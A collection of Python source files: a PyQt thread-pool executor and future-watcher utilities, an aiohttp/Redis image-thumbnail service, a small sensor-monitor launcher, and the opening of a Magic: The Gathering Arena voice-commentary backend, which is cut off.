        t2 = Thread(target=self.perform_resizing)
        t2.start()
        self.dl_queue.join()      # wait for every download to be acknowledged
        self.img_queue.put(None)  # then tell the resizer to stop
        t2.join()
        end = time.perf_counter()
        logging.info("END make_thumbnails in {} seconds".format(end - start))
|
climon.py
|
from multiprocessing import Process, Queue
import mon
import web
def main(conf_fname, debug=False):
    """Run the sensor monitor in a child process and the web UI in this one.

    Readings flow from the monitor to the web server over a shared queue;
    we block on the web server, then reap the monitor process.
    """
    readings = Queue()
    monitor = Process(target=mon.run, args=(conf_fname, readings, debug))
    monitor.start()
    web.run(conf_fname, readings, debug)
    monitor.join()
# Script entry point: run with the default config file, debugging disabled.
if __name__ == '__main__':
    main('climon.conf', debug=False)
|
parallel_processing.py
|
# -*- coding: utf-8 -*-
""" concurrent - A module for handing concurrency with PyQt
Adapted from Orange3: https://github.com/biolab/orange3/blob/master/Orange/widgets/utils/concurrent.py
"""
# define authorship information
__authors__ = ['Lars Fasel']
__author__ = ','.join(__authors__)
__credits__ = []
__copyright__ = 'Copyright (c) 2017'
__license__ = 'GNU AGPLv3'
# maintenance information
__maintainer__ = 'Lars Fasel'
__email__ = 'systemcheck@team-fasel.com'
# define version information
__requires__ = ['PyQt5']
__version_info__ = (0, 1, 0)
__version__ = 'v{}.{}.{}'.format(*__version_info__)
__revision__ = __version__
import threading
import atexit
import logging
import warnings
import weakref
from functools import partial
import concurrent.futures
from concurrent.futures import Future, CancelledError, TimeoutError
from contextlib import contextmanager
from PyQt5 import QtCore, QtWidgets, QtGui
@contextmanager
def locked(mutex):
    """Hold *mutex* (a QMutex-like object with ``lock``/``unlock``) for the
    duration of the ``with`` block, releasing it even if the body raises."""
    mutex.lock()
    try:
        yield
    finally:
        mutex.unlock()
class _TaskDepotThread(QtCore.QThread):
    """
    A special 'depot' thread used to transfer Task instance into threads
    started by a QThreadPool.
    """
    _lock = threading.Lock()
    _instance = None
    def __new__(cls):
        # Enforce the singleton: only the first construction succeeds.
        if _TaskDepotThread._instance is not None:
            raise RuntimeError("Already exists")
        return QtCore.QThread.__new__(cls)
    def __init__(self):
        super().__init__()
        self.start()
        # Need to handle queued method calls from this thread.
        self.moveToThread(self)
        # Make sure the thread is stopped cleanly at interpreter exit.
        atexit.register(self._cleanup)
    def _cleanup(self):
        self.quit()
        self.wait()
    @staticmethod
    def instance():
        """Return the process-wide depot thread, creating it on first use."""
        with _TaskDepotThread._lock:
            if _TaskDepotThread._instance is None:
                _TaskDepotThread._instance = _TaskDepotThread()
            return _TaskDepotThread._instance
    @QtCore.pyqtSlot(object, object)
    def transfer(self, obj, thread):
        """
        Transfer `obj` (:class:`QObject`) instance from this thread to the
        target `thread` (a :class:`QThread`).
        """
        # moveToThread must be called from the object's current thread,
        # which is why this runs as a slot on the depot thread itself.
        assert obj.thread() is self
        assert QtCore.QThread.currentThread() is self
        obj.moveToThread(thread)
    def __del__(self):
        self._cleanup()
class _TaskRunnable(QtCore.QRunnable):
    """
    A QRunnable for running a :class:`Task` by a :class:`ThreadExecutor`.
    """
    def __init__(self, future, task, args, kwargs):
        QtCore.QRunnable.__init__(self)
        self.future = future
        self.task = task
        self.args = args
        self.kwargs = kwargs
        self.eventLoop = None  # created lazily inside run()
    def run(self):
        """
        Reimplemented from `QRunnable.run`
        """
        self.eventLoop = QtCore.QEventLoop()
        self.eventLoop.processEvents()
        # Move the task to the current thread so it's events, signals, slots
        # are triggered from this thread.
        assert self.task.thread() is _TaskDepotThread.instance()
        # Blocking call: the depot thread performs moveToThread on our behalf
        # (moveToThread must run on the object's current thread).
        QtCore.QMetaObject.invokeMethod(
            self.task.thread(), "transfer", QtCore.Qt.BlockingQueuedConnection,
            QtCore.Q_ARG(object, self.task),
            QtCore.Q_ARG(object, QtCore.QThread.currentThread())
        )
        self.eventLoop.processEvents()
        # Schedule task.run from the event loop.
        self.task.start()
        # Quit the loop and exit when task finishes or is cancelled.
        self.task.finished.connect(self.eventLoop.quit)
        self.task.cancelled.connect(self.eventLoop.quit)
        self.eventLoop.exec_()
class FutureRunnable(QtCore.QRunnable):
    """
    A QRunnable that executes ``func(*args, **kwargs)`` on a QThreadPool
    thread and stores the outcome in a `concurrent.futures.Future`.

    Parameters
    ----------
    future : concurrent.futures.Future
        Receives the result (or exception) of calling `func(*args, **kwargs)`.
    func : Callable
        Function to invoke in a thread.
    args : tuple
        Positional arguments for `func`.
    kwargs : dict
        Keyword arguments for `func`.

    Typical use: create a ``Future``, wrap it with ``FutureRunnable`` and a
    callable, hand the runnable to ``QThreadPool.globalInstance().start``,
    then read ``future.result()`` once it completes.
    """
    def __init__(self, future, func, args, kwargs):
        # type: (Future, Callable, tuple, dict) -> None
        super().__init__()
        self.future = future
        self.task = (func, args, kwargs)

    def run(self):
        """
        Reimplemented from `QRunnable.run`
        """
        try:
            if not self.future.set_running_or_notify_cancel():
                return  # future was cancelled before execution started
            fn, pos_args, kw_args = self.task
            try:
                outcome = fn(*pos_args, **kw_args)
            except BaseException as err:  # pylint: disable=broad-except
                self.future.set_exception(err)
            else:
                self.future.set_result(outcome)
        except BaseException:  # pylint: disable=broad-except
            # Last-resort guard: never let an exception escape into Qt.
            logging.getLogger(__name__).critical(
                "Exception in worker thread.", exc_info=True)
class ThreadExecutor(QtCore.QObject, concurrent.futures.Executor):
    """
    ThreadExecutor object class provides an interface for running tasks
    in a QThreadPool.
    Parameters
    ----------
    parent : QObject
        Executor's parent instance.
    threadPool : Optional[QThreadPool]
        Thread pool to be used by the instance of the Executor. If `None`
        then ``QThreadPool.globalInstance()`` will be used.
    """
    def __init__(self, parent=None, threadPool=None, **kwargs):
        super().__init__(parent, **kwargs)
        if threadPool is None:
            threadPool = QtCore.QThreadPool.globalInstance()
        self._threadPool = threadPool
        self._depot_thread = None   # lazily created _TaskDepotThread singleton
        self._futures = []          # futures submitted and not yet completed
        self._shutdown = False
        self._state_lock = threading.Lock()
    def _get_depot_thread(self):
        # Create the depot thread on first use only.
        if self._depot_thread is None:
            self._depot_thread = _TaskDepotThread.instance()
        return self._depot_thread
    def submit(self, func, *args, **kwargs):
        """
        Reimplemented from :class:`concurrent.futures.Executor`
        Schedule the `func(*args, **kwargs)` to be executed and return an
        :class:`Future` instance representing the result of the computation.
        """
        with self._state_lock:
            if self._shutdown:
                raise RuntimeError("Cannot schedule new futures after " +
                                   "shutdown.")
            f = Future()
            runnable = FutureRunnable(f, func, args, kwargs)
            self._futures.append(f)
            f.add_done_callback(self._future_done)
            self._threadPool.start(runnable)
            return f
    def __make_task_runnable(self, task):
        # Prepare a Task for pool execution: it must be thread-affine to the
        # caller and unparented so it can be moved between threads.
        if task.thread() is not QtCore.QThread.currentThread():
            raise ValueError("Can only submit Tasks from it's own " +
                             "thread.")
        if task.parent() is not None:
            raise ValueError("Can not submit Tasks with a parent.")
        task.moveToThread(self._get_depot_thread())
        # Use the Task's own Future object
        f = task.future()
        runnable = _TaskRunnable(f, task, (), {})
        return f, runnable
    def shutdown(self, wait=True):
        """
        Shutdown the executor and free all resources. If `wait` is True then
        wait until all pending futures are executed or cancelled.
        """
        with self._state_lock:
            self._shutdown = True
            futures = list(self._futures)
        if wait:
            concurrent.futures.wait(futures)
    def _future_done(self, future):
        # Remove futures when finished.
        # NOTE(review): runs on worker threads without holding _state_lock
        # while submit() mutates the same list - confirm this race is
        # acceptable (list.remove/append are GIL-atomic in CPython).
        self._futures.remove(future)
class FutureWatcher(QtCore.QObject):
    """
    An `QObject` watching the state changes of a `concurrent.futures.Future`
    Note
    ----
    The state change notification signals (`done`, `finished`, ...)
    are always emitted when the control flow reaches the event loop
    (even if the future is already completed when set).
    Note
    ----
    An event loop must be running, otherwise the notifier signals will
    not be emitted.
    Parameters
    ----------
    parent : QObject
        Parent object.
    future : Future
        The future instance to watch.
    Example
    -------
    >>> app = QCoreApplication.instance() or QCoreApplication([])
    >>> f = submit(lambda i, j: i ** j, 10, 3)
    >>> watcher = FutureWatcher(f)
    >>> watcher.resultReady.connect(lambda res: print("Result:", res))
    >>> watcher.done.connect(app.quit)
    >>> _ = app.exec()
    Result: 1000
    >>> f.result()
    1000
    """
    #: Signal emitted when the future is done (cancelled or finished)
    done = QtCore.pyqtSignal(Future)
    #: Signal emitted when the future is finished (i.e. returned a result
    #: or raised an exception - but not if cancelled)
    finished = QtCore.pyqtSignal(Future)
    #: Signal emitted when the future was cancelled
    cancelled = QtCore.pyqtSignal(Future)
    #: Signal emitted with the future's result when successfully finished.
    resultReady = QtCore.pyqtSignal(object)
    #: Signal emitted with the future's exception when finished with an
    #: exception.
    exceptionReady = QtCore.pyqtSignal(BaseException)
    # A private event type used to notify the watcher of a Future's completion
    __FutureDone = QtCore.QEvent.registerEventType()
    def __init__(self, future=None, parent=None, **kwargs):
        super().__init__(parent, **kwargs)
        self.__future = None
        if future is not None:
            self.setFuture(future)
    def setFuture(self, future):
        # type: (Future) -> None
        """
        Set the future to watch.
        Raise a `RuntimeError` if a future is already set.
        Parameters
        ----------
        future : Future
        """
        if self.__future is not None:
            raise RuntimeError("Future already set")
        self.__future = future
        # Hold only a weak reference inside the callback so the watcher can
        # be garbage collected while the future is still pending.
        selfweakref = weakref.ref(self)
        def on_done(f):
            assert f is future
            selfref = selfweakref()
            if selfref is None:
                return
            try:
                # Post an event instead of emitting directly: the callback
                # may run on a worker thread, signals must fire on ours.
                QtCore.QCoreApplication.postEvent(
                    selfref, QtCore.QEvent(FutureWatcher.__FutureDone))
            except RuntimeError:
                # Ignore RuntimeErrors (when C++ side of QObject is deleted)
                # (? Use QObject.destroyed and remove the done callback ?)
                pass
        future.add_done_callback(on_done)
    def future(self):
        # type: () -> Future
        """
        Return the future instance.
        """
        return self.__future
    def isCancelled(self):
        warnings.warn("isCancelled is deprecated", DeprecationWarning,
                      stacklevel=2)
        return self.__future.cancelled()
    def isDone(self):
        warnings.warn("isDone is deprecated", DeprecationWarning,
                      stacklevel=2)
        return self.__future.done()
    def result(self):
        # type: () -> Any
        """
        Return the future's result.
        Note
        ----
        This method is non-blocking. If the future has not yet completed
        it will raise an error.
        """
        try:
            return self.__future.result(timeout=0)
        except TimeoutError:
            raise RuntimeError("Future is not yet done")
    def exception(self):
        # type: () -> Optional[BaseException]
        """
        Return the future's exception.
        Note
        ----
        This method is non-blocking. If the future has not yet completed
        it will raise an error.
        """
        try:
            return self.__future.exception(timeout=0)
        except TimeoutError:
            raise RuntimeError("Future is not yet done")
    def __emitSignals(self):
        # Translate the completed future's state into the matching signals;
        # `done` is always emitted, after the more specific signal.
        assert self.__future is not None
        assert self.__future.done()
        if self.__future.cancelled():
            self.cancelled.emit(self.__future)
            self.done.emit(self.__future)
        elif self.__future.done():
            self.finished.emit(self.__future)
            self.done.emit(self.__future)
            if self.__future.exception():
                self.exceptionReady.emit(self.__future.exception())
            else:
                self.resultReady.emit(self.__future.result())
        else:
            assert False
    def customEvent(self, event):
        # Reimplemented.
        if event.type() == FutureWatcher.__FutureDone:
            self.__emitSignals()
        super().customEvent(event)
class FutureSetWatcher(QtCore.QObject):
    """
    An `QObject` watching the state changes of a list of
    `concurrent.futures.Future` instances
    Note
    ----
    The state change notification signals (`doneAt`, `finishedAt`, ...)
    are always emitted when the control flow reaches the event loop
    (even if the future is already completed when set).
    Note
    ----
    An event loop must be running, otherwise the notifier signals will
    not be emitted.
    Parameters
    ----------
    parent : QObject
        Parent object.
    futures : List[Future]
        A list of future instance to watch.
    Example
    -------
    >>> app = QCoreApplication.instance() or QCoreApplication([])
    >>> fs = [submit(lambda i, j: i ** j, 10, 3) for i in range(10)]
    >>> watcher = FutureSetWatcher(fs)
    >>> watcher.resultReadyAt.connect(
    ...     lambda i, res: print("Result at {}: {}".format(i, res))
    ... )
    >>> watcher.doneAll.connect(app.quit)
    >>> _ = app.exec()
    Result at 0: 1000
    ...
    """
    #: Signal emitted when the future at `index` is done (cancelled or
    #: finished)
    doneAt = QtCore.pyqtSignal([int, Future])
    #: Signal emitted when the future at index is finished (i.e. returned
    #: a result)
    finishedAt = QtCore.pyqtSignal([int, Future])
    #: Signal emitted when the future at `index` was cancelled.
    cancelledAt = QtCore.pyqtSignal([int, Future])
    #: Signal emitted with the future's result when successfully
    #: finished.
    resultReadyAt = QtCore.pyqtSignal([int, object])
    #: Signal emitted with the future's exception when finished with an
    #: exception.
    exceptionReadyAt = QtCore.pyqtSignal([int, BaseException])
    #: Signal reporting the current completed count
    progressChanged = QtCore.pyqtSignal([int, int])
    #: Signal emitted when all the futures have completed.
    doneAll = QtCore.pyqtSignal()
    def __init__(self, futures=None, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.__futures = None     # list of pending futures; None = not set
        self.__countdone = 0      # how many futures have completed so far
        if futures:
            self.setFutures(futures)
    def setFutures(self, futures):
        # type: (List[Future]) -> None
        """
        Set the future instances to watch.
        Raise a `RuntimeError` if futures are already set.
        Parameters
        ----------
        futures : List[Future]
        """
        if self.__futures is not None:
            raise RuntimeError("already set")
        # NOTE(review): with an empty `futures` list no callbacks ever fire,
        # so doneAll is never emitted - confirm callers never pass [].
        self.__futures = []
        selfweakref = weakref.ref(self)
        # Queued invocation marshals the emit back onto this object's thread.
        schedule_emit = methodinvoke(self, "__emitpending", (int, Future))
        for i, future in enumerate(futures):
            self.__futures.append(future)
            def on_done(index, f):
                selfref = selfweakref()  # not safe really
                if selfref is None:
                    return
                try:
                    schedule_emit(index, f)
                except RuntimeError:
                    # Ignore RuntimeErrors (when C++ side of QObject is deleted)
                    # (? Use QObject.destroyed and remove the done callback ?)
                    pass
            # partial binds this iteration's index (avoids late binding).
            future.add_done_callback(partial(on_done, i))
    @QtCore.pyqtSlot(int, Future)
    def __emitpending(self, index, future):
        # type: (int, Future) -> None
        # Runs on the watcher's own thread via the queued methodinvoke.
        assert QtCore.QThread.currentThread() is self.thread()
        assert self.__futures[index] is future
        assert future.done()
        assert self.__countdone < len(self.__futures)
        self.__futures[index] = None  # drop the reference, keep the slot
        self.__countdone += 1
        if future.cancelled():
            self.cancelledAt.emit(index, future)
            self.doneAt.emit(index, future)
        elif future.done():
            self.finishedAt.emit(index, future)
            self.doneAt.emit(index, future)
            if future.exception():
                self.exceptionReadyAt.emit(index, future.exception())
            else:
                self.resultReadyAt.emit(index, future.result())
        else:
            assert False
        self.progressChanged.emit(self.__countdone, len(self.__futures))
        if self.__countdone == len(self.__futures):
            self.doneAll.emit()
    def flush(self):
        """
        Flush all pending signal emits currently enqueued.
        """
        assert QtCore.QThread.currentThread() is self.thread()
        QtCore.QCoreApplication.sendPostedEvents(self, QtCore.QEvent.MetaCall)
class methodinvoke(object):
    """
    Thin callable wrapper around `QMetaObject.invokeMethod`.

    Invokes a named QObject method, optionally across thread boundaries
    (or simply as a delayed call on the same thread via the queued
    connection type).

    Note
    ----
    An event loop MUST be running in the target QObject's thread.

    Parameters
    ----------
    obj : QObject
        A QObject instance.
    method : str
        The method name. This method must be registered with the Qt object
        meta system (e.g. decorated by a Slot decorator).
    arg_types : tuple
        A tuple of positional argument types.
    conntype : Qt.ConnectionType
        The connection/call type. Qt.QueuedConnection (the default) and
        Qt.BlockingConnection are the most interesting.
    See Also
    --------
    QMetaObject.invokeMethod
    """

    @staticmethod
    def from_method(method, arg_types=(), *, conntype=QtCore.Qt.QueuedConnection):
        """
        Create and return a `methodinvoke` instance from a bound method.
        Parameters
        ----------
        method : Union[types.MethodType, types.BuiltinMethodType]
            A bound method of a QObject registered with the Qt meta object
            system (e.g. decorated by a Slot decorators)
        arg_types : Tuple[Union[type, str]]
            A tuple of positional argument types.
        conntype: Qt.ConnectionType
            The connection/call type (Qt.QueuedConnection and
            Qt.BlockingConnection are the most interesting)
        Returns
        -------
        invoker : methodinvoke
        """
        return methodinvoke(method.__self__, method.__name__, arg_types,
                            conntype=conntype)

    def __init__(self, obj, method, arg_types=(), *,
                 conntype=QtCore.Qt.QueuedConnection):
        self.obj = obj
        self.method = method
        self.arg_types = tuple(arg_types)
        self.conntype = conntype

    def __call__(self, *args):
        # Pack each positional argument with its declared meta type; extra
        # args beyond arg_types are silently dropped by zip, as before.
        packed = [QtCore.Q_ARG(atype, value)
                  for atype, value in zip(self.arg_types, args)]
        return QtCore.QMetaObject.invokeMethod(
            self.obj, self.method, self.conntype, *packed)
|
thumbnail_service.py
|
import asyncio
import errno
import json
import logging
import os
import threading
import uuid
from .redis_factory import RedisFactory
from .thumbnail_processor import ThumbnailProcessor
class ThumbnailException(Exception):
    """Base error for the thumbnail service.

    Parameters
    ----------
    reason : str
        Human-readable description of the failure; also used as the
        exception message.
    """

    def __init__(self, reason):
        # BUG FIX: pass the reason to Exception so str(exc) carries the
        # message (the original never initialised the base, so str(exc)
        # was always empty).
        super().__init__(reason)
        self.reason = reason
class FileValidationException(ThumbnailException):
    """Raised when an uploaded file or a requested file id fails validation."""

    def __init__(self, reason):
        super().__init__(reason)
class ThumbnailService:
    """CRUD-style facade over uploaded images and their thumbnails.

    File metadata lives in Redis under ``file-<uuid>`` keys; image bytes and
    generated thumbnails live on disk under ``THUMBNAIL_PATH``.  Thumbnail
    generation runs on a background thread after upload.
    """
    # Multipart form field that must carry the image.
    FORM_PARAMETER = 'image'
    # On-disk storage root, overridable via the environment.
    THUMBNAIL_PATH = os.environ.get('THUMBNAIL_PATH', '/usr/images/')
    def __init__(self, redis_factory=RedisFactory()):
        # NOTE(review): the default factory is built once at import time and
        # shared by every instance (mutable default) - confirm intended.
        self.log = logging.getLogger('ThumbnailService')
        self.redis_factory = redis_factory
        self.processor = ThumbnailProcessor()
    def get_file(self, id):
        """Return the public entity for one stored file; raises when unknown."""
        return self._build_file_entity(self._get_file_info(id))
    def get_files(self):
        """Return entities for every stored file (Redis keys ``file-*``)."""
        redis = self.redis_factory.create_instance()
        data = redis.mget(redis.keys('file-*'))
        return [self._build_file_entity(json.loads(info)) for info in data]
    async def save_file(self, reader):
        """Read the image part from multipart *reader*, store it on disk,
        record metadata in Redis and start thumbnail generation.

        Raises FileValidationException when the form field is missing.
        """
        field = await reader.next()
        # Skip unrelated form fields until the image part is found.
        while field is not None and field.name != self.FORM_PARAMETER:
            field = await reader.next()
        if field is None:
            raise FileValidationException('\"{}\" parameter is missing'.format(self.FORM_PARAMETER))
        redis = self.redis_factory.create_instance()
        id = str(uuid.uuid4())
        self._try_create_folder()
        size = await self._try_save_file(field, id)
        info = {
            'id': id,
            'filename': field.filename,
            'path': self.THUMBNAIL_PATH,
            'ready': False,  # flipped to True once the thumbnail exists
            'size': {
                'original': size
            }
        }
        redis.set(self._build_key(info['id']), json.dumps(info))
        self._run_save_file(info)
        return self._build_file_entity(info)
    def _run_save_file(self, info):
        # Generate the thumbnail on a daemon-less background thread and then
        # update the Redis record with the final size / ready flag.
        def _run():
            file_path = os.path.join(self.THUMBNAIL_PATH, info['id'])
            self.processor.process(file_path)
            info['size']['thumbnail'] = os.stat(self.processor.build_thumbnail_filename(file_path)).st_size
            info['ready'] = True
            redis = self.redis_factory.create_instance()
            redis.set(self._build_key(info['id']), json.dumps(info))
        threading.Thread(target=_run).start()
    def _try_create_folder(self):
        """Ensure the storage root exists, tolerating concurrent creation."""
        if not os.path.exists(self.THUMBNAIL_PATH):
            try:
                os.makedirs(self.THUMBNAIL_PATH)
            except OSError as exc:
                # EEXIST means another request created it first - that's fine.
                if exc.errno != errno.EEXIST:
                    raise ThumbnailException('Failed to access to the image storage')
    async def _try_save_file(self, field, filename):
        """Stream the multipart *field* to disk chunk by chunk; return bytes written."""
        size = 0
        with open(os.path.join(self.THUMBNAIL_PATH, filename), 'wb') as f:
            while True:
                chunk = await field.read_chunk()
                if not chunk:
                    break
                size += len(chunk)
                f.write(chunk)
        return size
    def delete_file(self, id):
        """Remove the original, its thumbnail and the Redis record; return
        the deleted file's entity."""
        redis = self.redis_factory.create_instance()
        info = self._get_file_info(id, redis)
        file_path = os.path.join(info['path'], info['id'])
        os.remove(file_path)
        os.remove(self.processor.build_thumbnail_filename(file_path))
        redis.delete(self._build_key(id))
        return self._build_file_entity(info)
    def get_thumbnail_info(self, id):
        """Return the on-disk path of the thumbnail plus a user-facing
        download filename derived from the original upload name."""
        info = self._get_file_info(id)
        path = os.path.join(info['path'], self.processor.build_thumbnail_filename(info['id']))
        splitted = os.path.splitext(info['filename'])
        # NOTE(review): assumes the processor always emits JPEG output -
        # confirm against ThumbnailProcessor.
        return {
            'path': path,
            'filename': self.processor.build_thumbnail_filename(splitted[0]) + '.jpg'
        }
    def _get_file_info(self, id, redis=None):
        """Load and decode the Redis metadata record for *id*.

        Raises FileValidationException when no record exists.
        """
        redis = redis or self.redis_factory.create_instance()
        key = self._build_key(id)
        data = redis.get(key)
        if data is None:
            raise FileValidationException('Thumbnail with id = {} does not exist'.format(id))
        return json.loads(data)
    def _build_key(self, filename):
        # Redis key namespace for file records.
        return 'file-{}'.format(filename)
    def _build_file_entity(self, data):
        """Project the internal metadata record onto the public API shape
        (thumbnail size included only once processing has finished)."""
        result = {
            'id': data['id'],
            'filename': data['filename'],
            'ready': data['ready'],
            'size': {
                'original': data['size']['original']
            }
        }
        if data['ready']:
            result['size']['thumbnail'] = data['size']['thumbnail']
        return result
|
commentary_backend.py
|
import _thread
from datetime import datetime
from enum import Enum
import json
import logging
import logging.handlers
import os
import re
import sys
import tkinter
from tkinter import StringVar, filedialog, messagebox, ttk
from tkinter.scrolledtext import ScrolledText
import urllib.parse
import urllib.request
import psutil
import websocket
from seikasay2 import SeikaSay2
# message from mtgatracker_backend
class MessageKey:
    """JSON keys of messages received from mtgatracker_backend."""
    GAME_HISTORY_EVENT = "game_history_event"  # list of event fragments
    TYPE = "type"
    TEXT = "text"
class MessageValue:
    """Values of the "type" field in tracker message fragments."""
    GAME = "game"
    TURN = "turn"
    HERO = "hero"          # fragment belongs to the local player
    OPPONENT = "opponent"  # fragment belongs to the opponent
class Verb:
    """Verb tokens that appear between fragments in tracker text arrays."""
    # NOTE(review): "ATTAKING" is a misspelling of "ATTACKING", but the
    # name is referenced elsewhere (e.g. parse()), so it is kept as-is.
    ATTAKING = "attacking"
    BLOCKS = "blocks"
    CASTS = "casts"
    COUNTERS = "counters"
    DRAWS = "draws"
    EXILES = "exiles"
    LIFE_TOTAL_CHANGED = "'s life total changed"
    PLAYS = "plays"
    RESOLVES = "resolves"
    SENT_TO_GRAVEYARD = "sent to graveyard"
    STARTING_HAND = "'s starting hand:"
    VS = "vs"
class Reason:
    """Reason strings attached by mtgatracker_backend to graveyard events."""
    CONJURE = "(Conjure)"
    DESTROY = "(Destroy)"
    DISCARD = "(Discard)"
    MILL = "(Mill)"
    PUT = "(Put)"
    SACRIFICE = "(Sacrifice)"
    # NOTE(review): "DAMEGE" is a misspelling kept because other code
    # references the name.
    SBA_DAMEGE = "(SBA_Damage)"
    # Bug fix: a stray trailing comma made this constant a 1-tuple, so the
    # string comparison in parse() could never match deathtouch deaths.
    SBA_DEATHTOUCH = "(SBA_Deathtouch)"
    SBA_ZERO_TOUGHNESS = "(SBA_ZeroToughness)"
    SBA_UNATTACHED_AURA = "(SBA_UnattachedAura)"
    NIL = "(nil)"
class ParseKey:
    """Keys of the flat event dict produced by CommentaryBackend.parse()."""
    IS_OPPONENT = "isOpponent"      # True when the event belongs to the opponent
    MESSAGE_TYPE = "messageType"
    EVENT = "event"                 # one of the Event constants
    VERB = "verb"
    ATTACKER = "attacker"
    BLOCKER = "blocker"
    CARD = "card"
    SOURCE = "source"
    TARGET = "target"
    REASON = "reason"
    LIFE_FROM = "life_from"
    LIFE_TO = "life_to"
    LIFE_DIFF = "life_diff"
class ReplaceWord(Enum):
    """Placeholder names substitutable in speech templates via "{name}"."""
    ATTACKER = ParseKey.ATTACKER
    BLOCKER = ParseKey.BLOCKER
    CARD = ParseKey.CARD
    SOURCE = ParseKey.SOURCE
    TARGET = ParseKey.TARGET
    LIFE_FROM = ParseKey.LIFE_FROM
    LIFE_TO = ParseKey.LIFE_TO
    LIFE_DIFF = ParseKey.LIFE_DIFF
class ConfigKey:
    """Keys used in config.json."""
    SEIKA_SAY2_PATH = "seikaSay2Path"
    SPEAKER1 = "speaker1"
    SPEAKER2 = "speaker2"
    CID = "cid"    # SeikaSay2 voice id
    NAME = "name"
    HERO_COMMENTARY_TYPE = "heroCommentaryType"
    OPPONENT_COMMENTARY_TYPE = "opponentCommentaryType"
    MTGATRACKER_BACKEND_URL = "mtgatrackerBackendUrl"
    WAV_OUTPUT = "wavOutput"
    YUKARINETTE_CONNECTOR_NEO = "yukarinetteConnectorNeo"
    YUKARINETTE_CONNECTOR_NEO_URL = "yukarinetteConnectorNeoUrl"
class ConfigValue:
    """Values for the commentary-type config keys."""
    SPEAKER1 = "speaker1"
    SPEAKER2 = "speaker2"
    NEVER = "never"  # commentary disabled for that side
class SpeakerKey:
    """Keys used in the per-speaker phrase definition JSON files."""
    SPEAK = "speak"
    TEXT = MessageKey.TEXT
    EVENT = ParseKey.EVENT
    TYPE = MessageKey.TYPE
class SpeakerValue:
    """Values appearing in the per-speaker phrase definition files."""
    SEIKA_SAY2 = "seikaSay2"  # marks the speaker-wide SeikaSay2 parameter entry
    GAIN = "gain"
    LOSE = "lose"
class SpeakerParamKey:
    """SeikaSay2 synthesis parameter names (see seikasay2.speak kwargs)."""
    ASYNC = "async"
    VOLUME = "volume"
    SPEED = "speed"
    PITCH = "pitch"
    ALPHA = "alpha"
    INTONATION = "intonation"
    EMOTION_EP = "emotionEP"
    EMOTION_P = "emotionP"
    OVER_BANNER = "overBanner"
class SpeakerLabel:
    """Japanese display labels for the speech events."""
    GAME_START = "ゲーム開始時"
    GAME_WIN = "ゲーム勝利時"
    GAME_LOSE = "ゲーム敗北時"
    MULLIGAN_CHECK = "マリガンチェック時"
    TURN_START = "ターン開始時"
    DRAW = "カードを引いた時"
    DISCARD = "カードを捨てた時"
    PLAY_LAND = "土地をプレイした時"
    CAST_SPELL = "呪文を唱えた時"
    COUNTERED = "呪文が打ち消された時"
    RESOLVE = "呪文が解決した時"
    EXILE = "カードが追放された時"
    CONJURE = "墓地にカードが置かれた時(創出)"
    DESTROY = "墓地にカードが置かれた時(破壊)"
    MILL = "墓地にカードが置かれた時(切削)"
    PUT = "墓地にカードが置かれた時(効果)"
    SACRIFICE = "墓地にカードが置かれた時(生け贄)"
    DIE = "墓地にカードが置かれた時(死亡)"
    UNATTACHED_AURA = "墓地にカードが置かれた時(不正オーラ)"
    NIL = "墓地にカードが置かれた時(対象不適正)"
    ATTACK = "攻撃クリーチャー指定時"
    BLOCK = "ブロッククリーチャー指定時"
    LIFE_GAIN = "ライフが増えた時"
    LIFE_LOSE = "ライフが減った時"
class Event:
    """Internal event identifiers emitted by parse() and keyed in phrase files."""
    GAME_START = "gameStart"
    GAME_WIN = "gameWin"
    GAME_LOSE = "gameLose"
    MULLIGAN_CHECK = "MulliganCheck"
    TURN_START = "TurnStart"
    DRAW = "Draw"
    DISCARD = "Discard"
    PLAY_LAND = "PlayLand"
    CAST_SPELL = "CastSpell"
    COUNTERED = "Countered"
    RESOLVE = "Resolve"
    ATTACK = "Attack"
    BLOCK = "Block"
    LIFE_GAIN = "LifeGain"
    LIFE_LOSE = "LifeLose"
    DIE = "Die"
    DESTROY = "Destroy"
    SACRIFICE = "Sacrifice"
    EXILE = "Exile"
    PUT_INTO_GRAVEYARD = "PutIntoGraveyard"
    CONJURE = "Conjure"
class SpeakerWindowEntry(Enum):
    """Rows of the phrase-editor window.

    Each value is a 2-tuple: (event key, Japanese label text); accessed as
    ``entry.value[0]`` / ``entry.value[1]`` when building the editor grid.
    """
    GAME_START = (Event.GAME_START, "ゲーム開始時:")
    GAME_WIN = (Event.GAME_WIN, "ゲーム勝利時:")
    GAME_LOSE = (Event.GAME_LOSE, "ゲーム敗北時:")
    MULLIGAN_CHECK = (Event.MULLIGAN_CHECK, "マリガンチェック時:")
    TURN_START = (Event.TURN_START, "ターン開始時:")
    DRAW = (Event.DRAW, "カードを引いた時:")
    DISCARD = (Event.DISCARD, "カードを捨てた時:")
    PLAY_LAND = (Event.PLAY_LAND, "土地をプレイした時:")
    CAST_SPELL = (Event.CAST_SPELL, "呪文を唱えた時:")
    COUNTERED = (Event.COUNTERED, "呪文が打ち消された時:")
    RESOLVE = (Event.RESOLVE, "呪文が解決された時:")
    ATTACK = (Event.ATTACK, "攻撃クリーチャー指定時:")
    BLOCK = (Event.BLOCK, "ブロッククリーチャー指定時:")
    LIFE_GAIN = (Event.LIFE_GAIN, "ライフが増えた時:")
    LIFE_LOSE = (Event.LIFE_LOSE, "ライフが減った時:")
    DIE = (Event.DIE, "クリーチャーが死亡した時:")
    DESTROY = (Event.DESTROY, "パーマネントが破壊された時:")
    SACRIFICE = (Event.SACRIFICE, "パーマネントを生け贄に捧げた時:")
    EXILE = (Event.EXILE, "カードが追放された時:")
    PUT_INTO_GRAVEYARD = (Event.PUT_INTO_GRAVEYARD, "カードが墓地に置かれた時:")
    CONJURE = (Event.CONJURE, "カードが創出された時:")
class ProcessName:
    """Executable names of the companion processes this tool interacts with."""
    ASSISTANT_SEIKA = "AssistantSeika.exe"
    MTGATRACKER_BACKEND = "mtgatracker_backend.exe"
    SEIKA_SAY2 = "SeikaSay2.exe"
class CommentaryBackend(tkinter.Frame):
def __init__(self, master=None):
    """Set up constants, default configuration, the main window and logging."""
    super().__init__(master)
    # Constants (this tool targets Windows, hence the backslash paths).
    self.CONFIG_FILE = "config\\config.json"
    self.DEFAULT_SPEAKER_FILE = "config\\defaultSpeaker.json"
    self.LOG_FILE = os.path.basename(__file__).split(".")[0]+".log"
    self.BAT_FOR_WAV_FILE = "WAVファイル出力_{}.bat".format(datetime.now().strftime('%Y%m%d_%H%M%S'))
    self.WAV_OUTPUT_DIR = os.getcwd()+"\\wav"
